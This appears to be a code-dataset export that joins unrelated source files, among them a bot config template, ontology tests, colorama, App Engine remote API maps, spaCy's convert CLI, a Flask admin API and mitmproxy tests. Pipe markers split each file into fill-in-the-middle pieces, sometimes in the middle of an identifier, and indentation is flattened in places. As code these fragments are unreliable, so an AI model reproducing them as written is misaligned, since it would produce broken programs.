mauodias/PyFuteBOT | configTemplate.py | Python | gpl-2.0 | 365 | 0.030137 | def __init__(self):
self.twitter = twitter()
self.facebook = | facebook()
self.core = core()
class twitter():
    # Twitter API credentials -- replace the placeholders with real values
    # before running the bot.
    consumer_key='CONSUMER_KEY'
    consumer_secret='CONSUMER_SECRET'
    access_token_key='ACCESS_TOKEN_KEY'
    access_token_secret='ACCESS_TOKEN_SECRET'
class facebook():
    # Facebook credentials: access token and the id of the target group.
    token='TOKEN'
    group='GROUP_ID'
class core():
    # Delay, presumably in seconds, between bot loop iterations -- TODO confirm.
    loopTime=60
mclumd/lene | tests/ontology_tests/create_tests.py | Python | mit | 3,101 | 0.00387 | # tests.ontology_tests.create_tests
# Tests for the create functionality of the ontology
#
# Author: Benjamin Bengfort <benjamin@bengfort.com>
# Created: timestamp
#
# Copyright (C) 2014 Bengfort.com
# For license information, see LICENSE.txt
#
# ID: create_tests.py [] benjamin@bengfort.com $
"""
Tests for the create functionality of the ontology.
This includes the construction of the following objects:
* OWL Classes
* OWL Data Properties
* OWL Object Properties
* OWL Instances
As well as the compilation, creation, and serialization of an entire
ontology to RDF/XML or to any other format supported by the lene package.
"""
##########################################################################
## Imports
##########################################################################
import unittest
import tempfile
from lene.exceptions import *
from lene.ontology.create import *
from rdflib import Graph, Literal, Namespace, URIRef
from rdflib.namespace import DC, FOAF, OWL, RDF, RDFS
##########################################################################
## OWLClass Unit Tests
##########################################################################
class OWLClassTests(unittest.TestCase):
    """Unit tests for OWLClass bind/unbind (placeholders, all skipped)."""
    @unittest.skip("Not implemented")
    def test_bind_to_graph(self):
        """
        Assert that binding adds correct number of nodes
        """
        pass
    @unittest.skip("Not implemented")
    def test_unbind_from_graph(self):
        """
        Assert that unbinding removes correct number of nodes
        """
        pass
##########################################################################
## OWLClass Integration Tests
##########################################################################
class OWLClassIntegrationTest(unittest.TestCase):
"""
Test the complete construction of an OWL ontology with just simple
OWL Class objects, etc.
"""
def test_ontology_construction(self):
"""
Test end to end ontology construction with OWLClass
"""
# Create an RDF graph
graph = Graph()
# Create various classes
Plant = OWLClass("Plant", OWL.Thing, "The plant type", "The class of all plant types")
Flower = OWLClass("Flower", UMD.Plant, "Flowering plants", "Flowering plants, also known as angiosperms.")
Shrub = OWLClass("Shrub", UMD.Plant, "Shrubbery", "Shrubs, a type of plant which branches from the base.")
# Bind the classes to the graph
| Plant | .bind(graph)
Flower.bind(graph)
Shrub.bind(graph)
# Create and bind an instance of a flower
instance = Flower.instantiate("Magnolia")
graph.add(instance)
self.assertIn(Plant.root, graph)
self.assertIn(Flower.root, graph)
self.assertIn(Shrub.root, graph)
self.assertIn(instance, graph)
##########################################################################
## OWLGraph Tests
##########################################################################
class OWLGraphTests(unittest.TestCase):
    # Placeholder suite for OWLGraph; no tests written yet.
    pass
|
cortext/crawtextV2 | ~/venvs/crawler/lib/python2.7/site-packages/pip/_vendor/colorama/ansitowin32.py | Python | mit | 6,664 | 0.002101 | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
import re
import sys
from .ansi import AnsiFore, AnsiBack, AnsiStyle, Style
from .winterm import WinTerm, WinColor, WinStyle
from .win32 import windll
winterm = None
if windll is not None:
winterm = WinTerm()
def is_a_tty(stream):
    """Return whether *stream* reports itself as an interactive terminal.

    Streams without an ``isatty`` method are treated as non-ttys.
    """
    isatty = getattr(stream, 'isatty', None)
    return isatty is not None and isatty()
class StreamWrapper(object):
    '''
    Wraps a stream (such as stdout), acting as a transparent proxy for all
    attribute access apart from method 'write()', which is delegated to our
    Converter instance.
    '''
    def __init__(self, wrapped, converter):
        # double-underscore everything to prevent clashes with names of
        # attributes on the wrapped stream object.
        self.__wrapped = wrapped
        self.__convertor = converter
    def __getattr__(self, name):
        # Only invoked for names not found on the proxy itself, so every
        # attribute except 'write' falls through to the wrapped stream.
        return getattr(self.__wrapped, name)
    def write(self, text):
        # Delegate to the converter, which strips/translates ANSI sequences
        # before (possibly) writing to the wrapped stream.
        self.__convertor.write(text)
class AnsiToWin32(object):
'''
Implements a 'write()' method which, on Windows, will strip ANSI character
sequences from the text, and if outputting to a tty, will convert them into
win32 function calls.
'''
ANSI_RE = re.compile('\033\[((?:\d|;)*)([a-zA-Z])')
    def __init__(self, wrapped, convert=None, strip=None, autoreset=False):
        """
        :param wrapped: stream to wrap, normally sys.stdout or sys.stderr
        :param convert: translate ANSI sequences into win32 calls;
            auto-detected (Windows and wrapping a tty) when None
        :param strip: strip ANSI sequences from output; defaults to
            True on Windows when None
        :param autoreset: reset colors to defaults after every .write()
        """
        # The wrapped stream (normally sys.stdout or sys.stderr)
        self.wrapped = wrapped
        # should we reset colors to defaults after every .write()
        self.autoreset = autoreset
        # create the proxy wrapping our output stream
        self.stream = StreamWrapper(wrapped, self)
        on_windows = sys.platform.startswith('win')
        # should we strip ANSI sequences from our output?
        if strip is None:
            strip = on_windows
        self.strip = strip
        # should we should convert ANSI sequences into win32 calls?
        if convert is None:
            convert = on_windows and is_a_tty(wrapped)
        self.convert = convert
        # dict of ansi codes to win32 functions and parameters
        self.win32_calls = self.get_win32_calls()
        # are we wrapping stderr?
        self.on_stderr = self.wrapped is sys.stderr
    def should_wrap(self):
        '''
        True if this class is actually needed. If false, then the output
        stream will not be affected, nor will win32 calls be issued, so
        wrapping stdout is not actually required. This will generally be
        False on non-Windows platforms, unless optional functionality like
        autoreset has been requested using kwargs to init()
        '''
        # Returns the first truthy flag (not necessarily a bool).
        return self.convert or self.strip or self.autoreset
def get_win32_calls(self):
if self.convert and winterm:
return {
AnsiStyle.RESET_ALL: (winterm.reset_all, ),
AnsiStyle.BRIGHT: (winterm.style, WinStyle.BRIGHT),
AnsiStyle.DIM: (winterm.style, WinStyle.NORMAL),
AnsiStyle.NORMAL: (winterm.style, WinStyle.NORMAL),
AnsiFore.BLACK: (winterm.fore, WinColor.BLACK),
AnsiFore.RED: (winterm.fore, WinColor.RED),
AnsiFore.GREEN: (winterm.fore, WinColor.GREEN),
AnsiFore.YELLOW: (winterm.fore, WinColor.YELLOW),
AnsiFore.BLUE: (winterm.fore, WinColor.BLUE),
AnsiFore.MAGENTA: (winterm.fore, WinColor.MAGENTA),
AnsiFore.CYAN: (winterm.fore, WinColor.CYAN),
AnsiFore.WHITE: (winterm.fore, WinColor.GREY),
| AnsiFore.RESET: (winterm.fore, ),
AnsiBack.BLACK: (winterm.back, WinColor.BLACK),
AnsiBack.RED: (winterm.back, WinColor.RED),
AnsiBack.GREEN: (winterm.back, WinColor.GREEN),
AnsiBack.YELLOW: (winterm.back, WinColor.YELLOW),
AnsiBack.BLUE: (winterm.back, WinC | olor.BLUE),
AnsiBack.MAGENTA: (winterm.back, WinColor.MAGENTA),
AnsiBack.CYAN: (winterm.back, WinColor.CYAN),
AnsiBack.WHITE: (winterm.back, WinColor.GREY),
AnsiBack.RESET: (winterm.back, ),
}
def write(self, text):
if self.strip or self.convert:
self.write_and_convert(text)
else:
self.wrapped.write(text)
self.wrapped.flush()
if self.autoreset:
self.reset_all()
    def reset_all(self):
        # Restore default colors: via win32 when converting, otherwise by
        # emitting the ANSI reset sequence -- but only to a live tty.
        if self.convert:
            self.call_win32('m', (0,))
        elif not self.wrapped.closed and is_a_tty(self.wrapped):
            self.wrapped.write(Style.RESET_ALL)
def write_and_convert(self, text):
'''
Write the given text to our wrapped stream, stripping any ANSI
sequences from the text, and optionally converting them into win32
calls.
'''
cursor = 0
for match in self.ANSI_RE.finditer(text):
start, end = match.span()
self.write_plain_text(text, cursor, start)
self.convert_ansi(*match.groups())
cursor = end
self.write_plain_text(text, cursor, len(text))
def write_plain_text(self, text, start, end):
if start < end:
self.wrapped.write(text[start:end])
self.wrapped.flush()
    def convert_ansi(self, paramstring, command):
        # Only dispatch when converting; stripping alone just drops the
        # sequence (it was already removed from the plain-text output).
        if self.convert:
            params = self.extract_params(paramstring)
            self.call_win32(command, params)
def extract_params(self, paramstring):
def split(paramstring):
for p in paramstring.split(';'):
if p != '':
yield int(p)
return tuple(split(paramstring))
def call_win32(self, command, params):
if params == []:
params = [0]
if command == 'm':
for param in params:
if param in self.win32_calls:
func_args = self.win32_calls[param]
func = func_args[0]
args = func_args[1:]
kwargs = dict(on_stderr=self.on_stderr)
func(*args, **kwargs)
elif command in ('H', 'f'): # set cursor position
func = winterm.set_cursor_position
func(params, on_stderr=self.on_stderr)
elif command in ('J'):
func = winterm.erase_data
func(params, on_stderr=self.on_stderr)
elif command == 'A':
if params == () or params == None:
num_rows = 1
else:
num_rows = params[0]
func = winterm.cursor_up
func(num_rows, on_stderr=self.on_stderr)
|
Kazade/NeHe-Website | google_appengine/google/appengine/ext/remote_api/remote_api_services.py | Python | bsd-3-clause | 17,948 | 0.001059 | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Service configuration for remote API.
This module is shared by both the remote_api_stub and the handler.
"""
import sys
from google.appengine.api import api_base_pb
from google.appengine.api import mail_service_pb
from google.appengine.api import urlfetch_service_pb
from google.appengine.api import user_service_pb
from google.appengine.api.app_identity import app_identity_service_pb
from google.appengine.api.blobstore import blobstore_service_pb
from google.appengine.api.capabilities import capability_service_pb
from google.appengine.api.channel import channel_service_pb
from google.appengine.api.files import file_service_pb
from google.appengine.api.images import images_service_pb
from google.appengine.api.logservice import log_service_pb
from google.appengine.api.memcache import memcache_service_pb
from google.appengine.api.modules import modules_service_pb
from google.appengine.api.prospective_search import prospective_search_pb
from google.appengine.api.remote_socket import remote_socket_service_pb
from google.appengine.api.search import search_service_pb
from google.appengine.api.system import system_service_pb
from google.appengine.api.taskqueue import taskqueue_service_pb
from google.appengine.api.xmpp import xmpp_service_pb
from google.appengine.datastore import datastore_pb
from google.appengine.datastore import datastore_v4_pb
from google.appengine.ext.remote_api import remote_api_pb
SERVICE_PB_MAP = {
'app_identity_service': {
'SignForApp': (app_identity_service_pb.SignForAppRequest,
app_identity_service_pb.SignForAppResponse),
'GetPublicCertificatesForApp': (
app_identity_service_pb.GetPublicCertificateForAppRequest,
app_identity_service_pb.GetPublicCertificateForAppResponse),
'GetServiceAccountName': (
app_identity_service_pb.GetServiceAccountNameRequest,
app_identity_service_pb.GetServiceAccountNameResponse),
'GetDefaultGcsBucketName': (
app_identity_service_pb.GetDefaultGcsBucketNameRequest,
app_identity_service_pb.GetDefaultGcsBucketNameResponse),
'GetAccessToken': (app_identity_service_pb.GetAccessTokenRequest,
app_identity_service_pb.GetAccessTokenResponse),
},
'blobstore': {
'CreateUploadURL': (blobstore_service_pb.CreateUploadURLRequest,
blobstore_service_pb.CreateUploadURLResponse),
'DeleteBlob': (blobstore_service_pb.DeleteBlobRequest,
api_base_pb.VoidProto),
'FetchData': (blobstore_service_pb.FetchDataRequest,
blobstore_service_pb.FetchDataResponse),
'DecodeBlobKey': (blobstore_service_pb.DecodeBlobKeyRequest,
blobstore_service_pb.DecodeBlobKeyResponse),
'CreateEncodedGoogleStorageKey':
(blobstore_service_pb.CreateEncodedGoogleStorageKeyRequest,
blobstore_service_pb.CreateEncodedGoogleStorageKeyResponse),
},
'capability_service': {
'IsEnabled': (capability_service_pb.IsEnabledRequest,
capability_service_pb.IsEnabledResponse),
},
'channel': {
'CreateChannel': (channel_service_pb.CreateChannelRequest,
channel_service_pb.CreateChannelResponse),
'SendChannelMessage': (channel_service_pb.SendMessageRequest,
api_base_pb.VoidProto),
},
'datastore_v3': {
'Get': (datastore_pb.GetRequest, datastore_pb.GetResponse),
'Put': (datastore_pb.PutRequest, datastore_pb.PutResponse),
'Delete': (datastore_pb.DeleteRequest, datastore_pb.DeleteResponse),
'AllocateIds':(datastore_pb.AllocateIdsRequest,
datastore_pb.AllocateIdsResponse),
'RunQuery': (datastore_pb.Query,
datastore_pb.QueryResult),
'Next': (datastore_pb.NextRequest, datastore_pb.QueryResult),
'BeginTransaction':(datastore_pb.BeginTransactionRequest,
datastore_pb.Transaction),
'Commit': (datastore_pb.Transaction,
datastore_pb.CommitResponse),
'Rollback': (datastore_pb.Transaction,
api_base_pb.VoidProto),
'GetIndices': (api_base_pb.StringProto,
datastore_pb.CompositeIndices),
},
'da | tastore_v4': {
'AllocateIds': (datastore_v4_pb.AllocateIdsRequest,
| datastore_v4_pb.AllocateIdsResponse),
},
'file': {
'Create': (file_service_pb.CreateRequest,
file_service_pb.CreateResponse),
'Open': (file_service_pb.OpenRequest,
file_service_pb.OpenResponse),
'Close': (file_service_pb.CloseRequest,
file_service_pb.CloseResponse),
'Append': (file_service_pb.AppendRequest,
file_service_pb.AppendResponse),
'Stat': (file_service_pb.StatRequest,
file_service_pb.StatResponse),
'Delete': (file_service_pb.DeleteRequest,
file_service_pb.DeleteResponse),
'Read': (file_service_pb.ReadRequest,
file_service_pb.ReadResponse),
'ReadKeyValue': (file_service_pb.ReadKeyValueRequest,
file_service_pb.ReadKeyValueResponse),
'Shuffle': (file_service_pb.ShuffleRequest,
file_service_pb.ShuffleResponse),
'GetShuffleStatus': (file_service_pb.GetShuffleStatusRequest,
file_service_pb.GetShuffleStatusResponse),
'GetCapabilities': (file_service_pb.GetCapabilitiesRequest,
file_service_pb.GetCapabilitiesResponse),
'GetDefaultGsBucketName':
(file_service_pb.GetDefaultGsBucketNameRequest,
file_service_pb.GetDefaultGsBucketNameResponse),
'ListDir': (file_service_pb.ListDirRequest,
file_service_pb.ListDirResponse),
},
'images': {
'Transform': (images_service_pb.ImagesTransformRequest,
images_service_pb.ImagesTransformResponse),
'Composite': (images_service_pb.ImagesCompositeRequest,
images_service_pb.ImagesCompositeResponse),
'Histogram': (images_service_pb.ImagesHistogramRequest,
images_service_pb.ImagesHistogramResponse),
'GetUrlBase': (images_service_pb.ImagesGetUrlBaseRequest,
images_service_pb.ImagesGetUrlBaseResponse),
'DeleteUrlBase': (images_service_pb.ImagesDeleteUrlBaseRequest,
images_service_pb.ImagesDeleteUrlBaseResponse),
},
'logservice': {
'Flush': (log_service_pb.FlushRequest, api_base_pb.VoidProto),
'SetStatus': (log_service_pb.SetStatusRequest, api_base_pb.VoidProto),
'Read': (log_service_pb.LogReadRequest, log_service_pb.LogReadResponse),
},
'mail': {
'Send': (mail_service_pb.MailMessage, api_base_pb.VoidProto),
'SendToAdmins': (mail_service_pb.MailMessage, api_base_pb.VoidProto),
},
'matcher': {
'Subscribe': (prospective_search_pb.SubscribeRequest,
prospective_search_pb.SubscribeResponse),
'Unsubscribe': (prospective_search_pb.UnsubscribeRequest,
prospective_search_pb.UnsubscribeResponse),
'ListSubscriptions': (prospective_search_p |
nop33/indico-plugins | chat/indico_chat/blueprint.py | Python | gpl-3.0 | 2,683 | 0.004473 | # This file is part of Indico.
# Copyright (C) 2002 - 2017 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from indico.core.plugins import IndicoPluginBlueprint
from indico_chat.controllers.event import RHChatEventPage
from indico_chat.controllers.logs import RHChatManageEventLogs, RHChatManageEventShowLogs, RHChatManageEventAttachLogs
from indico_chat.controllers.management import (RHChatManageEvent, RHChatManageEventModify, RHChatManageEventRefresh,
RHChatManageEventRemove, RHChatManageEventCreate,
RHChatManageEventAttach)
blueprint = IndicoPluginBlueprint(' | chat', 'indico_chat', url_prefix='/event/<confId>')
# Event
blueprint.add_url_rule('/chat', 'event_page', RHChatEventPage)
# Event management
blueprint.add_url_rule('/manage/chat/', 'manage_rooms', RHChatManageEvent | )
blueprint.add_url_rule('/manage/chat/<int:chatroom_id>/', 'manage_rooms_modify', RHChatManageEventModify,
methods=('GET', 'POST'))
blueprint.add_url_rule('/manage/chat/<int:chatroom_id>/logs/', 'manage_rooms_logs', RHChatManageEventLogs)
blueprint.add_url_rule('/manage/chat/<int:chatroom_id>/logs/show', 'manage_rooms_show_logs',
RHChatManageEventShowLogs)
blueprint.add_url_rule('/manage/chat/<int:chatroom_id>/logs/attach', 'manage_rooms_attach_logs',
RHChatManageEventAttachLogs, methods=('POST',))
blueprint.add_url_rule('/manage/chat/<int:chatroom_id>/refresh', 'manage_rooms_refresh', RHChatManageEventRefresh,
methods=('POST',))
blueprint.add_url_rule('/manage/chat/<int:chatroom_id>/remove', 'manage_rooms_remove', RHChatManageEventRemove,
methods=('POST',))
blueprint.add_url_rule('/manage/chat/create', 'manage_rooms_create', RHChatManageEventCreate,
methods=('GET', 'POST'))
blueprint.add_url_rule('/manage/chat/attach', 'manage_rooms_attach', RHChatManageEventAttach, methods=('POST',))
|
spacy-io/spaCy | spacy/cli/convert.py | Python | mit | 10,094 | 0.001684 | from typing import Optional, Any, List, Union
from enum import Enum
from pathlib import Path
from wasabi import Printer
import srsly
import re
import sys
import itertools
from ._util import app, Arg, Opt
from ..training import docs_to_json
from ..tokens import DocBin
from ..training.converters import iob_to_docs, conll_ner_to_docs, json_to_docs
from ..training.converters import conllu_to_docs
# Converters are matched by file extension except for ner/iob, which are
# matched by file extension and content. To add a converter, add a new
# entry to this dict with the file extension mapped to the converter function
# imported from /converters.
CONVERTERS = {
    # All three CoNLL-U spellings are aliases for the same converter.
    "conllubio": conllu_to_docs,
    "conllu": conllu_to_docs,
    "conll": conllu_to_docs,
    "ner": conll_ner_to_docs,
    "iob": iob_to_docs,
    "json": json_to_docs,
}
# File types that can be written to stdout
# (single-element tuple: the trailing comma is required)
FILE_TYPES_STDOUT = ("json",)
class FileTypes(str, Enum):
    # Output formats accepted on the CLI; the str mixin lets members
    # compare equal to their raw string values during argument parsing.
    json = "json"
    spacy = "spacy"
@app.command("convert")
def convert_cli(
    # fmt: off
    input_path: str = Arg(..., help="Input file or directory", exists=True),
    output_dir: Path = Arg("-", help="Output directory. '-' for stdout.", allow_dash=True, exists=True),
    file_type: FileTypes = Opt("spacy", "--file-type", "-t", help="Type of data to produce"),
    n_sents: int = Opt(1, "--n-sents", "-n", help="Number of sentences per doc (0 to disable)"),
    seg_sents: bool = Opt(False, "--seg-sents", "-s", help="Segment sentences (for -c ner)"),
    model: Optional[str] = Opt(None, "--model", "--base", "-b", help="Trained spaCy pipeline for sentence segmentation to use as base (for --seg-sents)"),
    morphology: bool = Opt(False, "--morphology", "-m", help="Enable appending morphology to tags"),
    merge_subtokens: bool = Opt(False, "--merge-subtokens", "-T", help="Merge CoNLL-U subtokens"),
    converter: str = Opt("auto", "--converter", "-c", help=f"Converter: {tuple(CONVERTERS.keys())}"),
    ner_map: Optional[Path] = Opt(None, "--ner-map", "-nm", help="NER tag mapping (as JSON-encoded dict of entity types)", exists=True),
    lang: Optional[str] = Opt(None, "--lang", "-l", help="Language (if tokenizer required)"),
    concatenate: bool = Opt(None, "--concatenate", "-C", help="Concatenate output to a single file"),
    # fmt: on
):
    """
    Convert files into json or DocBin format for training. The resulting .spacy
    file can be used with the train command and other experiment management
    functions.
    If no output_dir is specified and the output format is JSON, the data
    is written to stdout, so you can pipe them forward to a JSON file:
    $ spacy convert some_file.conllu --file-type json > some_file.json
    DOCS: https://spacy.io/api/cli#convert
    """
    if isinstance(file_type, FileTypes):
        # We get an instance of the FileTypes from the CLI so we need its string value
        file_type = file_type.value
    # The CLI hands us a str; downstream helpers expect a Path.
    input_path = Path(input_path)
    # Keep "-" (stdout) as a plain string sentinel rather than a Path.
    output_dir = "-" if output_dir == Path("-") else output_dir
    # Suppress status messages when writing to stdout so they don't mix with data.
    silent = output_dir == "-"
    msg = Printer(no_print=silent)
    verify_cli_args(msg, input_path, output_dir, file_type, converter, ner_map)
    # Resolves "auto" to a concrete converter name (helper defined elsewhere
    # in this module) -- presumably via file extension/content sniffing.
    converter = _get_converter(msg, converter, input_path)
    convert(
        input_path,
        output_dir,
        file_type=file_type,
        n_sents=n_sents,
        seg_sents=seg_sents,
        model=model,
        morphology=morphology,
        merge_subtokens=merge_subtokens,
        converter=converter,
        ner_map=ner_map,
        lang=lang,
        concatenate=concatenate,
        silent=silent,
        msg=msg,
    )
def convert(
    input_path: Union[str, Path],
    output_dir: Union[str, Path],
    *,
    file_type: str = "json",
    n_sents: int = 1,
    seg_sents: bool = False,
    model: Optional[str] = None,
    morphology: bool = False,
    merge_subtokens: bool = False,
    converter: str = "auto",
    ner_map: Optional[Path] = None,
    lang: Optional[str] = None,
    concatenate: bool = False,
    silent: bool = True,
    msg: Optional[Printer],
) -> None:
    """Convert training data and write it out as JSON or DocBin (.spacy).

    input_path: File or directory to convert.
    output_dir: Target directory, or "-" to write to stdout.
    file_type: "json" or "spacy" (DocBin).
    converter: Key into CONVERTERS selecting the input format.
    concatenate: Merge all converted inputs into a single output file.
    msg: Status printer; created on demand when falsy.
    """
    if not msg:
        msg = Printer(no_print=silent)
    # ner_map is re-bound from a file path to its parsed dict (or None).
    ner_map = srsly.read_json(ner_map) if ner_map is not None else None
    doc_files = []
    for input_loc in walk_directory(Path(input_path), converter):
        # read_text opens and closes the handle in one step; the previous
        # open(...).read() never closed the file explicitly (ResourceWarning
        # under -X dev, leak on non-refcounting interpreters).
        input_data = input_loc.read_text(encoding="utf-8")
        # Use converter function to convert data
        func = CONVERTERS[converter]
        docs = func(
            input_data,
            n_sents=n_sents,
            seg_sents=seg_sents,
            append_morphology=morphology,
            merge_subtokens=merge_subtokens,
            lang=lang,
            model=model,
            no_print=silent,
            ner_map=ner_map,
        )
        doc_files.append((input_loc, docs))
    if concatenate:
        all_docs = itertools.chain.from_iterable([docs for _, docs in doc_files])
        doc_files = [(input_path, all_docs)]
    for input_loc, docs in doc_files:
        if file_type == "json":
            data = [docs_to_json(docs)]
            len_docs = len(data)
        else:
            db = DocBin(docs=docs, store_user_data=True)
            len_docs = len(db)
            data = db.to_bytes()
        if output_dir == "-":
            _print_docs_to_stdout(data, file_type)
        else:
            if input_loc != input_path:
                # Mirror the input directory structure under output_dir.
                subpath = input_loc.relative_to(input_path)
                output_file = Path(output_dir) / subpath.with_suffix(f".{file_type}")
            else:
                output_file = Path(output_dir) / input_loc.parts[-1]
                output_file = output_file.with_suffix(f".{file_type}")
            _write_docs_to_file(data, output_file, file_type)
            msg.good(f"Generated output file ({len_docs} documents): {output_file}")
def _print_docs_to_stdout(data: Any, output_type: str) -> None:
if output_type == "json":
srsly.write_json("-", data)
else:
sys.stdout.buffer.write(data)
def _write_docs_to_file(data: Any, output_file: Path, output_type: str) -> None:
if not output_file.parent.exists():
output_file.parent.mkdir(parents=True)
if output_type == "json":
srsly.write_json( | output_file, data)
else:
with output_file.open("wb") as file_:
file_.write(data)
def autodetect_ner_format(input_data: str) -> Optional[str]:
    """Guess whether NER data is "iob" (token|tag, pipe-separated) or "ner"
    (token<space>tag, one pair per line), based on the first 20 lines.

    Returns None when there is no evidence or the evidence is ambiguous.
    """
    # guess format from the first 20 lines
    lines = input_data.split("\n")[:20]
    format_guesses = {"ner": 0, "iob": 0}
    iob_re = re.compile(r"\S+\|(O|[IB]-\S+)")
    ner_re = re.compile(r"\S+\s+(O|[IB]-\S+)$")
    for line in lines:
        line = line.strip()
        if iob_re.search(line):
            format_guesses["iob"] += 1
        if ner_re.search(line):
            format_guesses["ner"] += 1
    # Only commit to a format when exactly one of the two patterns matched.
    if format_guesses["iob"] == 0 and format_guesses["ner"] > 0:
        return "ner"
    if format_guesses["ner"] == 0 and format_guesses["iob"] > 0:
        return "iob"
    return None
def walk_directory(path: Path, converter: str) -> List[Path]:
    """Recursively collect input files under *path*.

    Hidden entries (leading dot in the basename) are skipped, and for the
    "json", "conll" and "iob" converters only files whose name ends with the
    converter's extension are kept. A plain file argument is returned as-is.
    """
    if not path.is_dir():
        return [path]
    pending = [path]
    visited = set()
    locs = []
    while pending:
        current = pending.pop(0)
        key = str(current)
        if key in visited:
            continue
        visited.add(key)
        basename = current.parts[-1]
        if basename.startswith("."):
            continue
        if current.is_dir():
            pending.extend(current.iterdir())
        elif converter in ("json", "conll", "iob") and not basename.endswith(converter):
            continue
        else:
            locs.append(current)
    # It's good to sort these, in case the ordering messes up cache.
    return sorted(locs)
def verify_cli_args(
msg: Printer,
input_path: Union[str, Path],
output_dir: Union[str, Path],
file_type: FileTypes,
converter: str,
ner_map: Optional[Path],
):
input_path = Path(input_path)
if file_type not in FILE_TYPES_STDOUT and output_dir == "-":
msg.fail(
f"Can't write .{file_type} data to stdout. Please specify an out |
civiclee/Hack4Cause2017 | src/snack-overflow/emcit/emcit/api/user.py | Python | mit | 1,756 | 0 | """User administration API"""
from flask import request, jsonify, Blueprint
from flask_login import current_user
from emcit.models import User
from emcit.resources import UserAdministrationResource
from emcit.util import required_access, api_error, validate
from emcit.schemas import user_schema
user_api = Blueprint('user_api', __name__)
@user_api.route('', methods=['GET'])
@required_access('admin')
def get_users():
    """Return every user, serialized for the admin UI."""
    # A list comprehension (rather than map()) keeps this working on
    # Python 3, where map() returns a lazy iterator that jsonify cannot
    # serialize; on Python 2 the result is the same list as before.
    return jsonify([UserAdministrationResource(user) for user in User.all()])
@user_api.route('/<int:user_id>', methods=['GET'])
@required_access('admin')
def get_user(user_id):
    """Return a single user by primary key."""
    user = User.get(user_id)
    return jsonify(UserAdministrationResource(user))
@user_api.route('', methods=['POST'])
@required_access('admin')
@validate(user_schema)
def create_user():
    """Create a user from the validated JSON request body."""
    new_user = User.from_json(request.get_json())
    new_user.save()
    return jsonify(UserAdministrationResource(new_user))
@user_api.route('/<int:user_id>', methods=['PUT'])
@required_access('admin')
@validate(user_schema)
def update_user(user_id):
    """Update an existing user from the validated JSON request body."""
    user = User.get_by_id(user_id)
    if not user:
        return api_error('User not found', 404)
    # `payload` avoids shadowing the stdlib `json` module name; the original
    # also mixed `request.json` and the local dict -- they are the same
    # parsed body, so reading from one name is equivalent and clearer.
    payload = request.get_json()
    # Only re-hash the password when the client actually sent one.
    if 'password' in payload:
        user.set_password(payload.get('password'))
    user.name = payload.get('name')
    user.email = payload.get('email')
    user.phone_number = payload.get('phone_number')
    user.role = payload.get('role')
    user.save()
    return jsonify(UserAdministrationResource(user))
@user_api.route('/<int:id>', methods=['DELETE'])
@required_access('admin')
def delete_user(id):
    # Deletes a user by primary key; self-deletion is rejected so an admin
    # cannot remove their own account mid-session. The parameter must stay
    # named `id` to match the <int:id> URL converter.
    user = User.get(id)
    if not user:
        return api_error('User not found', 404)
    if user.id == current_user.id:
        # NOTE(review): 404 is an odd status here (the record exists);
        # 403 or 409 may be more accurate -- confirm with API consumers
        # before changing.
        return api_error('Cannot delete self', 404)
    user.delete()
    # 202 Accepted with an empty body.
    return '', 202
|
mitmproxy/mitmproxy | test/mitmproxy/addons/test_modifyheaders.py | Python | mit | 6,005 | 0.000666 | import pytest
from mitmproxy.addons.modifyheaders import parse_modify_spec, ModifyHeaders
from mitmproxy.test import taddons
from mitmproxy.test import tflow
from mitmproxy.test.tutils import tresp
def test_parse_modify_spec():
    """parse_modify_spec() splits "/flow-filter/subject/replacement" specs."""
    with_filter = parse_modify_spec("/foo/bar/voing", True)
    assert with_filter.matches.pattern == "foo"
    assert with_filter.subject == b"bar"
    assert with_filter.read_replacement() == b"voing"

    # Extra slashes inside the replacement are kept verbatim.
    embedded_slashes = parse_modify_spec("/foo/bar/vo/ing/", False)
    assert embedded_slashes.matches.pattern == "foo"
    assert embedded_slashes.subject == b"bar"
    assert embedded_slashes.read_replacement() == b"vo/ing/"

    # Two-part specs get a match-everything flow filter.
    two_parts = parse_modify_spec("/bar/voing", False)
    assert two_parts.matches(tflow.tflow())
    assert two_parts.subject == b"bar"
    assert two_parts.read_replacement() == b"voing"

    with pytest.raises(ValueError, match="Invalid regular expression"):
        parse_modify_spec("/[/two", True)
class TestModifyHeaders:
    """Behavioral tests for the ModifyHeaders addon."""

    def test_configure(self):
        mh = ModifyHeaders()
        with taddons.context(mh) as tctx:
            with pytest.raises(Exception, match="Cannot parse modify_headers"):
                tctx.configure(mh, modify_headers=["/"])
            tctx.configure(mh, modify_headers=["/foo/bar/voing"])

    def test_modify_headers(self):
        mh = ModifyHeaders()
        with taddons.context(mh) as tctx:
            tctx.configure(
                mh,
                modify_headers=[
                    "/~q/one/two",
                    "/~s/one/three"
                ]
            )
            f = tflow.tflow()
            f.request.headers["one"] = "xxx"
            mh.request(f)
            assert f.request.headers["one"] == "two"

            f = tflow.tflow(resp=True)
            f.response.headers["one"] = "xxx"
            mh.response(f)
            assert f.response.headers["one"] == "three"

            # Two specs for the same header accumulate values.
            tctx.configure(
                mh,
                modify_headers=[
                    "/~s/one/two",
                    "/~s/one/three"
                ]
            )
            f = tflow.tflow(resp=True)
            f.request.headers["one"] = "xxx"
            f.response.headers["one"] = "xxx"
            mh.response(f)
            assert f.response.headers.get_all("one") == ["two", "three"]

            tctx.configure(
                mh,
                modify_headers=[
                    "/~q/one/two",
                    "/~q/one/three"
                ]
            )
            f = tflow.tflow()
            f.request.headers["one"] = "xxx"
            mh.request(f)
            assert f.request.headers.get_all("one") == ["two", "three"]

            # test removal of existing headers
            tctx.configure(
                mh,
                modify_headers=[
                    "/~q/one/",
                    "/~s/one/"
                ]
            )
            f = tflow.tflow()
